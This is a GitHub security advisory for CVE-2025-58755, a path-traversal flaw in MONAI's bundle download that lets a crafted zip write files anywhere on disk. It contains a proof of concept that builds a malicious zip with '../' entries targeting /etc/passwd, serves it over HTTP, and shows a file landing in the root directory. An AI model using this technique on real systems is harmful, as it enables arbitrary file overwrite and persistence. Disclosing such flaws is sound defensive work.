Skip to content

A path traversal issue exists, leading to arbitrary file writes

High
ericspod published GHSA-x6ww-pf9m-m73m Sep 8, 2025

Package

No package listed

Affected versions

Latest version

Patched versions

None

Description

Summary

The extractall function zip_file.extractall(output_dir) is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability.

When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle  
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd
  adding: malicious.txt (stored 0%)
  adding: ../../../../../../etc/passwd (deflated 64%)
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls
malicious.zip  p1.py  p2.py  r1.py  test_bundle

Then start the http service through python

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')"
2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---
2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle'
2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract'
2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting'
2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip'
2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_'
2025-08-11 20:49:01,668 - INFO - > progress: True
2025-08-11 20:49:01,668 - INFO - ---


test_bundle.zip: 8.00kB [00:00, 204kB/s]
2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip
2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.
2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.
2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /
autodl-pub  cuda-keyring_1.0-1_all.deb  home  lib32   **malicious.txt**  opt   run   sys  var
bin         dev                         init  lib64   media          proc  sbin  tmp
boot        etc                         lib   libx32  mnt            root  srv   usr

We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file.
If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.

Impact

Arbitrary file write

Repair Suggestions

Check the contents of the downloaded Zip file, or use a safer method to load it

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2025-58755

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

Credits